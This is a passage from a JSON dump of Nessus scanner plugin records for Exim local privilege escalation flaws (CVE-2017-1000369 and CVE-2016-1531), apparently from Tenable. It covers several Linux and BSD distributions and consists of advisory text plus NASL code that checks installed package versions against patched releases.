causing a memory leak. 
This could lead to a stack-clash in user-space and as a result the attacker can “clash” or “smash” the stack or another memory region, or “jump” over the stack guard-page.\n Impact :\n\n A local attacker could obtain root privileges.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2017-09-25T00:00:00", "type": "nessus", "title": "GLSA-201709-19 : Exim: Local privilege escalation (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:exim", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201709-19.NASL", "href": "https://www.tenable.com/plugins/nessus/103447", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201709-19.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103447);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-1000369\");\n script_xref(name:\"GLSA\", value:\"201709-19\");\n\n script_name(english:\"GLSA-201709-19 : Exim: Local privilege escalation (Stack Clash)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201709-19\n(Exim: Local privilege escalation)\n\n Exim supports the use of multiple “-p” command line arguments\n causing a memory leak. This could lead to a stack-clash in user-space and\n as result the attacker can, “clash” or “smash” the stack or\n another memory region, or “jump” over the stack guard-page.\n \nImpact :\n\n A local attacker could obtain root privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201709-19\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Exim users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/exim-4.89-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-mta/exim\", unaffected:make_list(\"ge 4.89-r1\"), vulnerable:make_list(\"lt 4.89-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:qpkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Exim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:56:11", "description": "This update for exim fixes the following issues :\n\n - CVE-2017-1000369: Fixed a memory leak in exim commandline handling, which could be used to exhaust memory and make 'stack crash' attacks likely.\n (boo#1044692)", "cvss3": {}, "published": "2017-06-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : exim (openSUSE-2017-714) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2021-01-19T00:00:00", "cpe": 
["p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim-debugsource", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "p-cpe:/a:novell:opensuse:eximstats-html", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2017-714.NASL", "href": "https://www.tenable.com/plugins/nessus/101125", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-714.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101125);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-1000369\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2017-714) (Stack Clash)\");\n script_summary(english:\"Check for the openSUSE-2017-714 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for exim fixes the following issues :\n\n - CVE-2017-1000369: Fixed a memory leak in exim\n commandline handling, which could be used to exhaust\n memory and make 'stack crash' attacks likely.\n (boo#1044692)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1044692\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-4.86.2-10.3.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.2\", reference:\"exim-debuginfo-4.86.2-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debugsource-4.86.2-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-4.86.2-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-debuginfo-4.86.2-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximstats-html-4.86.2-10.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:23:41", "description": "This is a new version fixing local privilege escalation for set-uid root when using perl_startup.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-14T00:00:00", "type": "nessus", "title": "Fedora 23 : exim-4.86.2-1.fc23 (2016-e062971917)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:exim", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-E062971917.NASL", "href": "https://www.tenable.com/plugins/nessus/89891", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-e062971917.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89891);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1531\");\n script_xref(name:\"FEDORA\", value:\"2016-e062971917\");\n\n script_name(english:\"Fedora 23 : exim-4.86.2-1.fc23 (2016-e062971917)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is new version fixing local privilege escalation for set-uid root\nwhen using perl_startup.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1314293\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178745.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?76b9485b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"exim-4.86.2-1.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:36:04", "description": "This is a new version fixing local privilege escalation for set-uid root when using perl_startup.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-14T00:00:00", "type": "nessus", "title": "Fedora 22 : exim-4.85.2-1.fc22 (2016-0e3ca94d88)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:exim", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-0E3CA94D88.NASL", "href": "https://www.tenable.com/plugins/nessus/89881", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-0e3ca94d88.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89881);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1531\");\n script_xref(name:\"FEDORA\", value:\"2016-0e3ca94d88\");\n\n script_name(english:\"Fedora 22 : exim-4.85.2-1.fc22 (2016-0e3ca94d88)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is new version fixing local privilege escalation for set-uid root\nwhen using perl_startup.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1314293\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178772.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fea83aec\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"exim-4.85.2-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:36:19", "description": "The Exim development team reports :\n\nAll installations having Exim set-uid root and using 'perl_startup' are vulnerable to a local privilege escalation. Any user who can start an instance of Exim (and this is normally any user) can gain root privileges. 
If you do not use 'perl_startup' you should be safe.", "cvss3": {}, "published": "2016-03-03T00:00:00", "type": "nessus", "title": "FreeBSD : exim -- local privillege escalation (7d09b9ee-e0ba-11e5-abc4-6fb07af136d2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:exim", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_7D09B9EEE0BA11E5ABC46FB07AF136D2.NASL", "href": "https://www.tenable.com/plugins/nessus/89089", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89089);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-1531\");\n\n script_name(english:\"FreeBSD : exim -- local privillege escalation (7d09b9ee-e0ba-11e5-abc4-6fb07af136d2)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Exim development team reports :\n\nAll installations having Exim set-uid root and using 'perl_startup'\nare vulnerable to a local privilege escalation. Any user who can start\nan instance of Exim (and this is normally any user) can gain root\nprivileges. 
If you do not use 'perl_startup' you should be safe.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.exim.org/lurker/message/20160302.191005.a72d8433.en.html\"\n );\n # https://vuxml.freebsd.org/freebsd/7d09b9ee-e0ba-11e5-abc4-6fb07af136d2.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4b631496\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.86.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.85.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.84.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:37:14", "description": "A local root privilege escalation vulnerability was found in Exim, Debian's default mail transfer agent, in configurations using the'perl_startup' option (Only Exim via exim4-daemon-heavy enables Perl support).\n\nTo address the vulnerability, updated Exim versions clean the complete execution environment by default, affecting Exim and subprocesses such as transports calling other programs, and thus may break existing installations. 
New configuration options (keep_environment, add_environment) were introduced to adjust this behavior.\n\nMore information can be found in the upstream advisory at https://www.exim.org/static/doc/CVE-2016-1531.txt", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "nessus", "title": "Debian DSA-3517-1 : exim4 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3517.NASL", "href": "https://www.tenable.com/plugins/nessus/89926", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3517. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89926);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1531\");\n script_xref(name:\"DSA\", value:\"3517\");\n\n script_name(english:\"Debian DSA-3517-1 : exim4 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A local root privilege escalation vulnerability was found in Exim,\nDebian's default mail transfer agent, in configurations using\nthe'perl_startup' option (Only Exim via exim4-daemon-heavy enables\nPerl support).\n\nTo address the vulnerability, updated Exim versions clean the complete\nexecution environment by default, affecting Exim and subprocesses such\nas transports calling other programs, and thus may break 
existing\ninstallations. New configuration options (keep_environment,\nadd_environment) were introduced to adjust this behavior.\n\nMore information can be found in the upstream advisory at\nhttps://www.exim.org/static/doc/CVE-2016-1531.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.exim.org/static/doc/CVE-2016-1531.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3517\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the exim4 packages.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 4.80-7+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-1.\"\n );\n 